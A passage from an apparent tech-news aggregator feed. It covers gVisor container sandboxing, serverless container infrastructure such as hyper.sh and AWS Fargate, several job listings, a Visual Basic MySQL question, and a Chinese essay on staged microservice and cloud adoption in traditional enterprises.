“安全工作负载(workloads)是业界的首要任务,我们很高兴看到像 gVisor 这样的创新,并期待在规范方面进行合作,并对相关技术组件进行改进,从而为生态系统带来更大的安全性。”
  • Samuel Ortiz,Kata 技术指导委员会成员,英特尔公司首席工程师
“Hyper 非常高兴看到 gVisor 这样全新的提高容器隔离性的方法。行业需要一个强大的安全容器技术生态系统,我们期待通过与 gVisor 的合作让安全容器成为主流。“
  • Xu Wang,Kata 技术指导委员会成员,Hyper.sh CTO

和 Docker、Kubernetes 集成

gVisor 运行时可以通过 runsc(run Sandboxed Container) 和 Docker 以及 Kubernetes 进行无缝集成。
runsc 运行时与 Docker 的默认容器运行时 runc 可以互换。runsc 的安装很简单,一旦安装完成,只需要在运行 docker 的时候增加一个参数就可以使用沙箱容器:
$ docker run --runtime=runsc hello-world
$ docker run --runtime=runsc -p 3306:3306 mysql
在 Kubernetes 中,大多数资源隔离都以 Pod 为单位,因此 Pod 也自然成为了 gVisor 沙箱的边界(boundary)。Kubernetes 社区目前正在致力于实现沙箱 Pod API,但是今天 gVisor 沙箱已经可以在实验版中(experimental support)可用。
runsc 运行时可以通过 cri-o 或 cri-containerd 等项目来在 Kubernetes 群集中使用沙箱技术,这些项目会将 Kubelet 中的消息转换为 OCI 运行时命令。
gVisor 实现了大部分 Linux 系统 API ( 200 个系统调用,并且还在增加中),但并不是所有的系统调用。目前有一些系统调用和参数还没有支持,以及 /proc 和 /sys 文件系统的一些部分内容。因此,并不是说所有的应用程序都可以在 gVisor 中正常运行,但大部分应用程序应该都可以正常运行,包括 Node.js、Java 8、MySQL、Jenkins、Apache、Redis 和 MongoDB 等等。
gVisor 已经开源,可以在 https://github.com/google/gvisor 查看到其内容,相信这里将会是大家了解 gVisor 最好的开始.

          世界是 container 的,也是 microservice 的,但最终还是 serverless 的.      Cache   Translate Page      

副标题是这样的: “Hyper,Fargate,以及 Serverless infrastructure”。

世界上有两种基础设施,一种是拿来主义,另一种是自主可控。
原谅我也蹭个已经被浇灭的、没怎么火起来的热点。不过我们喜欢的是拿来主义,够用就行,不想也不需要过多的控制,也不想惹过多的麻烦,也就是 fully managed。
之所以想到写这篇文章,源于前几天看到的这篇来自微软 Azure 的博客内容: The Future of Kubernetes Is Serverless ,然后又顺手温习了一遍 AWS CTO 所撰写的 Changing the calculus of containers in the cloud 这篇文章。这两篇文章你觉得有可能有广告的嫌疑,都是在推销自家的共有云服务,但是仔细品味每一句话,我却觉得几乎没有几句废话,都很说到点子上,你可以点击进去看下原文。
有个前提需要说明的是,这里的 Serverless 指的是 Serverless infrastructure,而不是我们常听到的 AWS Lambda,Microsoft Azure Functions 或 Google Cloud Functions 等函数(功能)即服务(FaaS)技术,为了便于区分,我们将这些 FaaS 称为无服务器计算,和我们本文要介绍的无服务器基础设施还是不一样的。

IaaS:变革的开始

说到基础设施,首先来介绍下最先出现的 IaaS,即基础设施即服务。IaaS 免除了大部分硬件的 provision 工作,没人再关心机架、电源和服务器问题,使得运维工作更快捷,更轻松,感觉解放了很多人,让大家走上了富裕之路。
当然这一代的云计算服务,可不只是可以几分钟启动一台虚拟机那么简单。
除了 VM 之外, IaaS 厂商还提供了很多其他基础设施和中间件服务,这些组件被称为 building block ,比如网络和防火墙、数据库、缓存等老三样,最近还出现了非常多非常多的业务场景服务,大数据、机器学习和算法,以及IoT等,看起来就像个百货商店,使用云计算就像购物,架构设计就是购物清单,架构里的组件都可以在商店里买到。
基础设施则使用 IaaS 服务商所提供的各种服务,编写应用程序可以更专注于业务。这能带来很多好处:
  • 将精力集中投入到核心业务
  • 加快上线速度
  • 提高可用性
  • 快速扩缩容
  • 不必关心中间件的底层基础设施
  • 免去繁杂的安装、配置、备份和安全管理等运维工作
在 AWS 成为业界标准之后,各大软件公司,不管是新兴的还是老牌的,都开始着手打造自己的云,国外有微软、谷歌、IBM等,国内的 BAT 也都有自己的云,以及京东和美团这样的电商类公司也有自己的云产品,独立的厂商类似 UCloud 和青云等公司也发展的不错,甚至有开饭馆的也要出来凑热闹。而开源软件 OpenStack 和基于 OS 的创业公司和产品也层出不穷。
全民皆云。

容器:云计算的深入人心

之后在 2013 年,容器技术开始面向大众普及了。在 LXC 之前,容器对普通开发人员甚至 IT 业者来说几乎不是同一个维度的术语,那是些专业人员才能掌控的晦涩的术语和繁杂的命令集,大部分人都没有用过容器技术;但是随着 Docker 的出现,容器技术的门槛降低,也在软件行业变得普及。随着几年的发展,基本可以说容器技术已经非常成熟,已成为了开发的标配。
随着容器技术的成熟和普及,应用程序架构也出现了新的变化,可以说软件和基础设施的进化相辅相成。人们越来越多的认识到对技术栈的分层和解耦更加重要,不同层之间的技术和责任、所有权等界限清晰明了,这也和软件设计中的模块松耦合原则很相像。
在有了责权明晰的分层结构之后,每个人可以更容易集中在自己所关注的重点上。开发人员更关注应用程序本身了,在 Docker 火了的同时,也出现了 app-centric 的概念。甚至 CoreOS 还将自己对抗 OCI/runc 的标准称为 appc 。当然现在的 Docker 也不是原来的 Docker ,也是一个组件化的东西,很多组件,尤其是 runtime ,都可以替换为其他运行时。
和以应用程序为重心相对应的是传统的以基础设施为中心,即先有基础设施,围绕基础设施做架构设计和开发、部署,受基础设施的限制较多。而随着 IaaS 等服务的兴起,基础设施越来越简单,越来越多容易入手,而且还提供了编程化的接口,开发人员也可以非常方便的对基础设施进行管理,可以说云计算的出现也使得开发人员抢了一部分运维人员的饭碗(遗憾的是这种趋势太 high 了停不下来。。。)。
当然,现在以应用为中心这一概念也已经深入人心。特别是进化到极致的 FaaS ,自己只需要写几行代码,其他平台全给搞定了。

编排:兵家必争之地

容器解决了代码的可移植性的问题,也使得在云计算中出现新的基础设施应用模式成为可能。使用一个一致的、不可变的部署制品,比如镜像,可以让我们从复杂的服务器部署中解脱出来,也可以非常方便的部署到不同的运行环境中(可移植性)。
但是容器的出现也增加了新的工作内容,要想使用容器运行我们的代码,就需要一套容器管理系统,在我们编写完代码,打包到容器之后,需要选择合适的运行环境,设置好正确的扩容配置,相关的网络连接,安全策略和访问控制,以及监控、日志和分布式追踪系统。
之所以出现编排系统,就是因为一台机器已经不够用了,我们要准备很多机器,在上面跑容器,而且我不关心容器跑在哪台机器上,这个交给调度系统就行了。可以说,从一定层面上,编排系统逐渐淡化了主机这一概念,我们面对的是一个资源池,是一组机器,有多少个 CPU 和多少的内存等计算资源可用。
rkt vs Docker 的战争从开始其实就可以预料到结局,但在编排系统/集群管理上,这场“战争”则有着更多的不确定性。
Mesos(DC/OS)出来的最早,还有 Twitter 等公司做案例,也是早期容器调度系统的标配;Swarm 借助其根正苗红以及简单性、和 Docker 的亲和性,也要争一分地盘;不过现在看来赢家应该是 K8s,K8s 有 Google 做靠山,有 Google 多年调度的经验,加上 RedHat/CoreOS 这些反 Docker 公司的站队,社区又做得红红火火,总之是赢了。
据说今年在哥本哈根举办的 Kubecon 有 4300 人参加。不过当初 Dockercon 也是这声势,而现在影响力已经没那么大了,有种昨日黄花、人老色衰的感觉,不知道几年之后的 Kubernetes 将来会如何,是否会出现新的产品或服务来撼动 Kubernetes 现在的地位?虽然不一定,但是我们期待啊。

Serverless infrastructure:进化的结果

但是呢,淡化主机的存在性也只是淡化而已,并没有完全消除主机的概念,只是我们直接面向主机的机会降低了,不再直接面向主机进行部署,也不会为某些部门分配独占的主机等。主机出了问题还得重启,资源不够了还得添加新的主机,管理工作并没有完全消失。
但是管理一套集群带来了很大的复杂性,这也和使用云计算的初衷相反,更称不上云原生。
从用户的角度再次审视一下,可以发现一个长时间被我们忽略的问题:为什么只是想运行容器,非得先买一台 VM 装好 Docker,或者自己搭建一套 Kubernetes 集群,或者使用类似 EKS 这样的服务,乐此不疲的进行各种配置和调试,不仅花费固定的资产费,还增加了很多并没有任何价值的运维管理工作。
既然我们嫌弃手动在多台主机中部署容器过于麻烦,将其交给集群管理和调度系统去做,那么维护调度系统同样繁杂的工作,是不是也可以交给别人来做,外包出去呢?
按照精益思想,这些和核心业务目标无关,不能带来任何用户价值的过程,都属于浪费行为,都需要提出。
这时候,出现了 Serverless infrastructure 服务,最早的比如国内的 hyper.sh (2016.8 GA),以及去年发布的 AWS 的 Fargate(2017.12),微软的 ACI(Azure Container Instance,2017.7) 等。
以 hyper.sh 为例,使用起来和 Docker 非常类似,可以将本地的 Docker 体验原封不动的搬到云端:
$ brew install hyper 
$ hyper pull mysql
$ hyper run mysql
MySQL is running...
$ hyper run --link mysql wordpress
WordPress is running...
$ hyper fip attach 22.33.44.55 wordpress
22.33.44.55
$ open 22.33.44.55
大部分命令从 docker 换成 hyper 就可以了,体验如同使用 Docker 一模一样,第一次看到这样的应用给人的新奇感,并不亚于当初的 Docker 。
使用 Serverless infrastructure,我们可以再不必为如下事情烦恼:
  • 不必再去费心选择 VM 实例的类型,需要多少 CPU 和内存
  • 不必再担心使用什么版本的 Docker 和集群管理软件
  • 不必担心 VM 内中间件的安全漏洞
  • 不必担心集群资源利用率太低
  • 从为资源池付费变为为运行中的容器付费
  • 完全不可变基础设施
  • 不用因为 ps 时看到各种无聊的 agent 而心理膈应
我们需要做的就是安心写自己的业务应用,构建自己的镜像,选择合适的容器大小,付钱给 cloud 厂商,让他们把系统做好,股票涨高高。

Fargate(此处也可以换做 ACI ):大厂表态

尽管 AWS 不像 GCP 那样“热衷”于容器,但是 AWS 也还是早就提供了 ECS(Elastic Container Service)服务。
去年发布的 AWS Fargate 则是个无服务器的容器服务,Fargate 是为了实现 AWS 的容器服务,比如 ECS(Elastic Container Service) 和 EKS(Elastic Kubernetes Service) 等,将容器运行所需要的基础设施进行抽象化的技术,并且现在 ECS 已经可以直接使用 Fargate。
和提供虚拟机的 EC2 不同,Fargate 提供的是容器运行实例,用户以容器作为基本的运算单位,而不必担心底层主机实例的管理,用户只需建立容器镜像,指定所需要的 CPU 和内存大小,设置相应的网络和IAM(身分管理)策略即可。
对于前面我们的疑问,AWS 的答案是基础设施的坑我们来填,你们只需要专心写好自己的应用程序就行了,你不必担心启动多少资源,我们来帮你进行容量管理,你只需要为你的使用付费就行了。
可以说 Fargate 和 Lambda 等产品都诞生于此哲学之下。
终于可以专心编写自己最擅长的 CRUD 了,happy,happy。

Serverless infrastructure vs Serverless compute

再多说几句,主要是为了帮助大家辨别两种不同的无服务器架构:无服务器计算和无服务器基础设施。
说实话一下子从 EC2 迁移到 Lambda ,这步子确实有点大。
Lambda 等 FaaS 产品虽然更加简单,但是存在有如下很多缺点:
  • 使用场景:Lambda 更适合用户操作或事件驱动,不适合做守护服务、批处理等业务
  • 灵活性:固定的内核、AMI等,无法定制
  • 资源限制:文件系统、内存、进程线程数、请求 body 大小以及执行时间等很多限制
  • 编程语言限制
  • 很难做服务治理
  • 不方便调试和测试
Lambda 和容器相比最大的优势就是运维工作更少,基本没有,而且计费更精确,不需要为浪费的计算资源买单,而且 Lambda 响应更快,扩容效率会高一些。
可以认为 Fargate 等容器实例,就是结合了 EC2 实例和 Lambda 优点的产品,既像 Lambda 一样轻量,更关注核心的应用程序,还能像 EC2 一样带来很大的灵活性和可控性。
云原生会给用户更多的控制,但是需要用户更少的投入和负担。
Serverless infrastructure 可以让容器更加 cloud native。

fully managed:大势所趋

所谓的 fully managed,可以理解为用户花费很少的成本,就可以获得想要的产品、服务并可以进行相应的控制。
这两天,阿里云发布了 Serverless Kubernetes ,Serverless Kubernetes 与原生的 Kubernetes 完全兼容,可以采用标准的 API、CLI 来部署和管理应用,还可以继续使用各种传统资产,并且还能获得企业级的高可用和安全性保障。难道以后我们连 Kubernetes 也不用自己装了,大部分人只需要掌握 kubectl 命令就好了。
IaaS 的出现,让我们丢弃了各种 provision 工具,同时,各种 configuration management 工具如雨后春笋般的出现和普及;容器的出现,又让我们扔掉了刚买还没看几页的各种 Chef/Puppet 入门/圣经,匆忙学起 Kubernetes;有了 Serverless infrastructure,也差不多可以和各种编排工具说拜拜了。
不管你们是在单体转微服务,还是在传统上云、转容器,估计大家都会喜欢上 fully managed 的服务,人人都做 Ops,很多运维工作都可以共同分担。当然,也会有一部分运维工程师掩面而逃.

          Technical Architect - Data Solutions - CDW - Milwaukee, WI      Cache   Translate Page      
Experience with Microsoft SQL, MySQL, Oracle, and other database technologies. Predictive analytics, Machine Learning and/or AI skills will be a plus....
From CDW - Sat, 03 Nov 2018 06:11:29 GMT - View all Milwaukee, WI jobs
          Technical Architect - Data Solutions - CDW - Madison, WI      Cache   Translate Page      
Experience with Microsoft SQL, MySQL, Oracle, and other database technologies. Predictive analytics, Machine Learning and/or AI skills will be a plus....
From CDW - Sat, 03 Nov 2018 06:11:29 GMT - View all Madison, WI jobs
          Software Engineer - Microsoft - Bellevue, WA      Cache   Translate Page      
Presentation, Application, Business, and Data layers) preferred. Database development experience with technologies like MS SQL, MySQL, or Oracle....
From Microsoft - Sun, 28 Oct 2018 21:34:20 GMT - View all Bellevue, WA jobs
          Problema en codigo sql para visual basic      Cache   Translate Page      

Problem with SQL code for Visual Basic

Hi friends, can anyone tell me where my error is? The word FROM shows up with a red squiggly line and it won't let me run the code. I program in Visual Studio!! and I'm writing a program in Visual Basic .NET.
The code is the following:

Imports MySql.Data.MySqlClient

Public Class frm_inicio_sesion

    Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load

    End Sub

    Private Sub btn_ingresar_Click(sender...

Published on 05 November 2018 by JUAN MIGUEL

          致传统企业朋友:不够痛就别微服务,有坑      Cache   Translate Page      

一、微服务落地是一个复杂问题,牵扯到IT架构,应用架构,组织架构多个方面

在多家传统行业的企业走访和落地了微服务之后,发现落地微服务是一个非常复杂的问题,甚至都不完全是技术问题。

当时想微服务既然是改造应用,做微服务治理,类似注册,发现,熔断,限流,降级等,当然应该从应用开发组切入,一般一开始聊的会比较开心,从单体架构,到SOA,再到微服务架构,从Dubbo聊到SpringCloud,但是必然会涉及到微服务的发布和运维问题,涉及到DevOps和容器层,这些都不在开发组的控制范围内,一旦拉进运维组,对于容器的接受程度就成了一个问题,和传统物理机,虚拟机的差别,会带来什么风险等等等等,尤其是容器绝对不是轻量级的虚拟化这件事情,就不是一时半会儿能说的明白的。更何况就算说明白了,还有线上应用容器,一旦出了事情,谁背锅的问题,容器往往会导致应用层和基础设施层界限模糊,这使得背锅双方都会犹豫不决。

image

有的企业的微服务化是运维部门发起的,运维部门已经意识到了各种各样不统一的应用给运维带来的苦,也乐意接受容器的运维模式,这就涉及到容器直接的服务发现是否应该运维在容器层搞定,还是应用应该自己搞定的问题,还涉及Dockerfile到底是开发写还是运维写的问题。一旦容器化的过程中,开发不配合,运维单方面去做这个事情,是徒增烦恼却收益有限的。

下图是微服务实施的过程中涉及到的层次,具体的描述参考文章云架构师进阶攻略

image

在一些相对先进的企业,会在运维组和开发组之间,有个中间件组,或者叫做架构组,来负责推动微服务化改造的事情,架构组就既需要负责劝说业务开发实施微服务化,也要劝说运维组实施容器化,如果架构组的权威性不足,推动往往也会比较困难。

所以微服务,容器,DevOps的推动,不单单是一个技术问题,更是一个组织问题,在推动微服务的过程中,更加能够感觉到康威定律的作用,需要更高层次技术总监或者CIO的介入,方能够推动微服务的落地。

然而到了CIO层,在很多企业又体会不到技术层面的痛点了,而更加关注业务的层面了,只要业务能赚钱,架构的痛,中间件的痛,运维的痛,高层不是非常能够感知,也就体会不到微服务,容器化的技术优势了,而微服务和容器化对于业务的优势,很多厂家在说,能够说到表面,说不到心里。

因而微服务和容器化的改造,更加容易发生在一个扁平化的组织里面,由一个能够体会到基层技术细节的痛的CIO,高瞻远瞩的推动这件事情。这也是为什么微服务的落地一般率先落地在互联网公司,因为互联网公司的组织架构实在太平台,哪怕是高层,也离一线非常的近,了解一线的痛。

然而在传统行业就没有那么幸运了,层级往往会比较多,这个时候就需要技术上的痛足够痛,能够痛到影响业务,能够痛到影响收入,能够痛到被竞争对手甩在后面,才能上达天听。

我们接下来就梳理一下,在这个过程中的那些痛。

二、阶段一:单体架构群,多个开发组,统一运维组

image

2.1. 阶段一的组织状态

组织状态相对简单。

统一的运维组,管理物理机,物理网络,Vmware虚拟化等资源,同时部署上线由运维部负责。

开发组每个业务都是独立的,负责写代码,不同的业务沟通不多,开发除了做自己的系统外,还需要维护外包公司开发的系统,由于不同的外包公司技术选型差异较大,因而处于烟囱式的架构状态。

传统烟囱式架构如下图所示

image

2.2. 阶段一的运维模式

在传统架构下,基础设施层往往采取物理机或者虚拟化进行部署,为了不同的应用之间方便相互访问,多采取桥接扁平二层机房网络,也即所有的机器的IP地址都是可以相互访问的,不想互相访问的,多采用防火墙进行隔离。

无论是使用物理机,还是虚拟化,配置是相对复杂的,不是做过多年运维的人员,难以独立的创建一台机器,而且网络规划也需要非常小心,分配给不同业务部门的机器,网段不能冲突。所有这一切,都需要运维部门统一进行管理,一般的IT人员或者开发人员既没有专业性,也不可能给他们权限进行操作,要申请机器怎么办,走个工单,审批一下,过一段时间,机器就能创建出来。

2.3. 阶段一的应用架构

传统架构数据库层,由于外包公司独立开发,或者不同开发部门独立开发,不同业务使用不同的数据库,有用Oracle的,有用SQL Server的,有用Mysql的,有用MongoDB的,各不相同。

传统架构的中间件层,每个团队独立选型中间件:

传统架构的服务层,系统或者由外包公司开发,或者由独立团队开发。

传统架构前端,各自开发各自的前端。

2.4. 阶段一有什么问题吗?

其实阶段一没有任何问题,我们甚至能找出一万个理由说明这种模式的好处。

运维部和开放部是天然分开的,谁也不想管对方,两边的老大也是评级的,本相安无事。

机房当然只能运维人员能碰,这里面有安全的问题,专业性的问题,线上系统严肃的问题。如果交给没有那么专业的开发去部署环境,一旦系统由漏洞,谁能担责任,一旦线上系统挂了,又是谁的责任,这个问题问出来,能够让任何争论鸦雀无声。

数据库无论使用Oracle, DB2,还是SQL Server都没有问题,只要公司有足够的预算,而且性能也的确杠杠的,里面存储了大量存储过程,会使得应用开发简单很多,而且有专业的乙方帮忙运维,数据库如此关键,如果替换称为Mysql,一旦抗不出挂了,或者开源的没人维护,线上出了事情,谁来负责?

中间件,服务层,前端,全部由外包商或者乙方搞定,端到端维护,要改什么招手即来,而且每个系统都是完整的一套,部署方便,运维方便。

其实没有任何问题,这个时候上容器或者上微服务,的确自找麻烦。

2.5. 什么情况下才会觉得阶段一有问题?

当然最初的痛点应该在业务层面,当用户的需求开始变的多种多样,业务方时不时的就要上一个新功能,做一个新系统的时候,你会发现外包公司不是能完全搞定所有的事情,他们是瀑布模型的开发,而且开发出来的系统很难变更,至少很难快速变更。

于是你开始想自己招聘一些开发,开发自己能够把控的系统,至少能够将外包公司开发的系统接管过来,这个时候,应对业务部门的需求,就会灵活的多。

但是自己开发和维护就带来了新的问题,多种多样的数据库,根本不可能招聘到如此多样的DBA,人都非常的贵,而且随着系统的增多,这些数据库的lisense也非常的贵。

多种多样的中间件,每个团队独立选型中间件,没有统一的维护,没有统一的知识积累,无法统一保障SLA。一旦使用的消息队列,缓存,框架出了问题,整个团队没有人能够搞定这个事情,因为大家都忙于业务开发,没人有时间深入的去研究这些中间件的背后原理,常见的问题,如何调优等等。

前端框架也有相同的问题,技术栈不一致,界面风格不一致,根本无法自动做UI测试。

当维护了多套系统之后,你会发现,这些系统各个层次都有很多的共同点,很多能力是可以复用的,很多数据是可以打通的。同样一套逻辑,这里也有,那里也有,同样类型的数据,这里一份,那里一份,但是信息是隔离的,数据模型不统一,根本无法打通。

当出现这些问题的时候,才是您考虑进入第二个阶段。

三、阶段二:组织服务化,架构SOA化,基础设施云化

image

3.1. 阶段二的组织形态

怎么解决上面的问题呢?

根据康威定理,组织方面就需要有一定的调整,整个公司还是分运维组和开发组。

由于痛点是从业务层面发生的,开始调整的应该是开发组。

应该建立独立的前端组,统一前端框架,界面一致,所有人掌握统一的前端开发能力,积累前端代码,在有新的需求的时候,能够快速的进行开发。

建立中间件组,或者架构师组,这部分人不用贴近业务开发,每天的任务就是研究如何使用这些中间件,如何调优,遇到问题如何Debug,形成知识积累。如果有统一的一帮人专注中间件,就可以根据自身的情况,选择有限几个中间件集中研究,限定业务组只使用这些中间件,可保证选型的一致性,如果中间件被这个组统一维护,也可以提供可靠的SLA给业务方。

将业务开发组分出一部分来,建立中台组,将可以复用的能力和代码,交由这几个组开发出服务来,给业务组使用,这样数据模型会统一,业务开发的时候,首先先看看有哪些现成的服务可以使用,不用全部从零开发,也会提高开发效率。

3.2. 阶段二的应用架构

要建立中台,变成服务为其他业务使用,就需要使用SOA架构,将可以复用的组件服务化,注册到服务的注册中心。

对于有钱的企业,可能会采购商用的ESB总线,也有使用Dubbo自己封装称为服务注册中心。

接下来就是要考虑,哪些应该拆出来? 最后考虑的是如何拆出来?

这两个题目的答案,不同的企业不同,其实分为两个阶段,第一个阶段是尝试阶段,也即整个公司对于服务化拆分没有任何经验,当然不敢拿核心业务上手,往往选取一个边角的业务,先拆拆看,这个时候拆本身是重要的,其实是为了拆而拆,拆的比较理想化,符合领域驱动设计的最好,如何拆呢?当然是弄一个两个月,核心员工大家闭门开发,进行拆分和组合,来积累经验。很多企业目前处于这个阶段。

但是其实这个阶段的拆法也只能用来积累经验,因为咱们最初要拆分,是为了快速响应业务请求,而这个边角的模块,往往不是最痛的核心业务。本来业务就边角,拆不拆收益不大,而且也没办法很好的做能力复用。复用当然都想复用核心能力。

所以其实最重要的是第二个阶段,业务真正的服务化的阶段。当然要拿业务需求最多的核心业务逻辑下手,才能起到快速响应业务请求,复用能力的作用。

例如考拉最初也是一个使用Oracle,对外只有一个online业务的单体应用,而真正的拆分,就是围绕核心的下单业务逻辑进行的。

image

那核心业务逻辑中,哪些应该拆出来呢?很多企业会问我们,其实企业自己的开发最清楚。

这个时候经常犯的错误是,先将核心业务逻辑从单体应用中拆分出来。例如将下单逻辑形成下单服务,从online服务中拆分出来。

当然不应该这样,例如两军打仗,当炊事班的烟熏着战士了,是将中军大营搬出去,还是讲炊事班搬出去呢?当然是炊事班了。

另外一点是,能够形成复用的组件,往往不是核心业务逻辑。这个很好理解,两个不同的业务,当然是核心业务逻辑不同(要不就成一种业务了),核心业务逻辑往往是组合逻辑,虽然复杂,但是往往不具备复用性,就算是下单,不同的电商也是不一样的,这家推出了什么什么豆,那家推出了什么什么券,另一家有个什么什么活动,都是核心业务逻辑的不同,会经常变。能够复用的,往往是用户中心,支付中心,仓储中心,库存中心等等核心业务的周边逻辑。

所以拆分,应该将这些核心业务的周边逻辑,从核心业务里面拆出来,最终Online就剩下下单的核心路径了,就可以改成下单服务了。当业务方突然有了需求推出一个抢购活动,就可以复用刚才的周边逻辑了。抢购就成了另一个应用的核心逻辑,其实核心逻辑是传真引线的,周边逻辑是保存数据,提供原子化接口的。

那哪些周边逻辑应该先拆出来呢?问自己的开发吧,那些战战兢兢,自己修改后生怕把核心逻辑搞挂了的组,是自己有动力从核心逻辑中拆分出来的,这个不需要技术总监和架构师去督促,他们有自己的原有动力,是一个很自然的过程。

image

这里的原有动力,一个是开发独立,一个是上线独立,就像考拉的online系统里面,仓库组就想自己独立出去,因为他们要对接各种各样的仓储系统,全球这么多的仓库,系统都很传统,接口不一样,没新对接一个,开发的时候,都担心把下单核心逻辑搞挂了,造成线上事故,其实仓储系统可以定义自己的重试和容灾机制,没有下单那么严重。物流组也想独立出去,因为对接的物流公司太多了,也要经常上线,也不想把下单搞挂。

您也可以梳理一下贵公司的业务逻辑,也会有自行愿意拆分的业务,形成中台服务。

当周边的逻辑拆分之后,一些核心的逻辑,互相怕影响,也可以拆分出去,例如下单和支付,支付对接多个支付方的时候,也不想影响下单,也可以独立出去。

然后我们再看,如何拆分的问题?

关于拆分的前提,时机,方法,规范等,参考文章微服务化之服务拆分与服务发现

image

首先要做的,就是原有工程代码的标准化,我们常称为“任何人接手任何一个模块都能看到熟悉的面孔”

例如打开一个java工程,应该有以下的package:

另外是测试文件夹,每个类都应该有单元测试,要审核单元测试覆盖率,模块内部应该通过Mock的方法实现集成测试。

接下来是配置文件夹,配置profile,配置分为几类:

当一个工程的结构非常标准化之后,接下来在原有服务中,先独立功能模块 ,规范输入输出,形成服务内部的分离。在分离出新的进程之前,先分离出新的jar,只要能够分离出新的jar,基本也就实现了松耦合。

接下来,应该新建工程,新启动一个进程,尽早的注册到注册中心,开始提供服务,这个时候,新的工程中的代码逻辑可以先没有,只是转调用原来的进程接口。

为什么要越早独立越好呢?哪怕还没实现逻辑先独立呢?因为服务拆分的过程是渐进的,伴随着新功能的开发,新需求的引入,这个时候,对于原来的接口,也会有新的需求进行修改,如果你想把业务逻辑独立出来,独立了一半,新需求来了,改旧的,改新的都不合适,新的还没独立提供服务,旧的如果改了,会造成从旧工程迁移到新工程,边迁移边改变,合并更加困难。如果尽早独立,所有的新需求都进入新的工程,所有调用方更新的时候,都改为调用新的进程,对于老进程的调用会越来越少,最终新进程将老进程全部代理。

接下来就可以将老工程中的逻辑逐渐迁移到新工程,由于代码迁移不能保证逻辑的完全正确,因而需要持续集成,灰度发布,微服务框架能够在新老接口之间切换。

最终当新工程稳定运行,并且在调用监控中,已经没有对于老工程的调用的时候,就可以将老工程下线了。

3.3. 阶段二的运维模式

经过业务层的的服务化,也对运维组造成了压力。

应用逐渐拆分,服务数量增多。

在服务拆分的最佳实践中,有一条就是,拆分过程需要进行持续集成,保证功能一致。

image

而持续集成的流程,往往需要频繁的部署测试环境。

随着服务的拆分,不同的业务开发组会接到不同的需求,并行开发功能增多,发布频繁,会造成测试环境,生产环境更加频繁的部署。

而频繁的部署,就需要频繁创建和删除虚拟机。

如果还是采用上面审批的模式,运维部就会成为瓶颈,要不就是影响开发进度,要不就是被各种部署累死。

这就需要进行运维模式的改变,也即基础设施层云化。

虚拟化到云化有什么不一样呢?

首先要有良好的租户管理,从运维集中管理到租户自助使用模式的转换。

image

也即人工创建,人工调度,人工配置的集中管理模式已经成为瓶颈,应该变为租户自助的管理,机器自动的调度,自动的配置。

其次,要实现基于Quota和QoS的资源控制。

也即对于租户创建的资源的控制,不用精细化到运维手动管理一切,只要给这个客户分配了租户,分配了Quota,设置了Qos,租户就可以在运维限定的范围内,自由随意的创建,使用,删除虚拟机,无需通知运维,这样迭代速度就会加快。

再次,要实现基于虚拟网络,VPC,SDN的网络规划。

image

image

原来的网络使用的都是物理网络,问题在于物理网络是所有部门共享的,没办法交给一个业务部门自由的配置和使用。因而要有VPC虚拟网络的概念,每个租户可以随意配置自己的子网,路由表,和外网的连接等,不同的租户的网段可以冲突,互不影响,租户可以根据自己的需要,随意的在界面上,用软件的方式做网络规划。

除了基础设施云化之外,运维部门还应该将应用的部署自动化。

image

因为如果云计算不管应用,一旦出现扩容,或者自动部署的需求,云平台创建出来的虚拟机还是空的,需要运维手动上去部署,根本忙不过来。因而云平台,也一定要管理应用。

云计算如何管理应用呢?我们将应用分成两种,一种称为通用的应用,一般指一些复杂性比较高,但大家都在用的,例如数据库。几乎所有的应用都会用数据库,但数据库软件是标准的,虽然安装和维护比较复杂,但无论谁安装都是一样。这样的应用可以变成标准的PaaS层的应用放在云平台的界面上。当用户需要一个数据库时,一点就出来了,用户就可以直接用了。

image

所以对于运维模式的第二个改变是,通用软件PaaS化。

前面说过了,在开发部门有中间件组负责这些通用的应用,运维也自动部署这些应用,两个组的界限是什么样的呢?

一般的实践方式是,云平台的PaaS负责创建的中间件的稳定,保证SLA,当出现问题的时候,会自动修复。

而开发部门的中间件组,主要研究如何正确的使用这些PaaS,配置什么样的参数,使用的正确姿势等等,这个和业务相关。

image

除了通用的应用,还有个性化的应用,应该通过脚本进行部署,例如工具Puppet, Chef, Ansible, SaltStack等。

这里有一个实践是,不建议使用裸机部署,因为这样部署非常的慢,推荐基于虚拟机镜像的自动部署。在云平台上,任何虚拟机的创建都是基于镜像的,我们可以在镜像里面,将要部署的环境大部分部署好,只需要做少量的定制化,这些由部署工具完成。

image

下图是OpenStack基于Heat的虚拟机编排,除了调用OpenStack API基于镜像创建虚拟机之外,还要调用SaltStack的master,将定制化的指令下发给虚拟机里面的agent。

image

基于虚拟机镜像和脚本下发,可以构建自动化部署平台NDP

image

这样可以基于虚拟机镜像,做完整的应用的部署和上线,称为编排。基于编排,就可以进行很好的持续集成,例如每天晚上,自动部署一套环境,进行回归测试,从而保证修改的正确性。

image

进行完第二阶段之后,整个状态如上图所示。

这里运维部门的职能有了一定的改变,除了最基本的资源创建,还要提供自助的操作平台,PaaS化的中间件,基于镜像和脚本的自动部署。

开发部门的职能也有了一定的改变,拆分称为前端组,业务开发组,中台组,中间件组,其中中间件组合运维部门的联系最紧密。

3.4. 阶段二有什么问题吗?

其实大部分的企业,到了这个阶段,已经可以解决大部分的问题了。

能够做到架构SOA化,基础设施云化的公司已经是传统行业在信息化领域的佼佼者了。

中台开发组基本能够解决中台的能力复用问题,持续集成也基本跑起来了,使得业务开发组的迭代速度明显加快。

集中的中间件组或者架构组,可以集中选型,维护,研究消息队列,缓存等中间件。

在这个阶段,由于业务的稳定性要求,很多公司还是会采用Oracle商用数据库,也没有什么问题。

实现到了阶段二,在同行业内,已经有一定的竞争优势了。

3.5. 什么情况下才会觉得阶段二有问题?

我们发现,当传统行业不再满足于在本行业的领先地位,希望能够对接到互联网业务的时候,上面的模式才出现新的痛点。

对接互联网所面临的最大的问题,就是巨大的用户量所带来的请求量和数据量,会是原来的N倍,能不能撑得住,大家都心里没底。

例如有的客户推出互联网理财秒杀抢购,原来的架构无法承载近百倍的瞬间流量。

有的客户对接了互联网支付,甚至对接了国内最大的外卖平台,而原来的ESB总线,就算扩容到最大规模(13个节点),也可能撑不住。

有的客户虽然已经用了Dubbo实现了服务化,但是没有熔断,限流,降级的服务治理策略,有可能一个请求慢,高峰期波及一大片,或者请求全部接进来,最后都撑不住而挂一片。

有的客户希望实现工业互连网平台,可是接入的数据量动辄PB级别,如果扛的住是一个很大的问题。

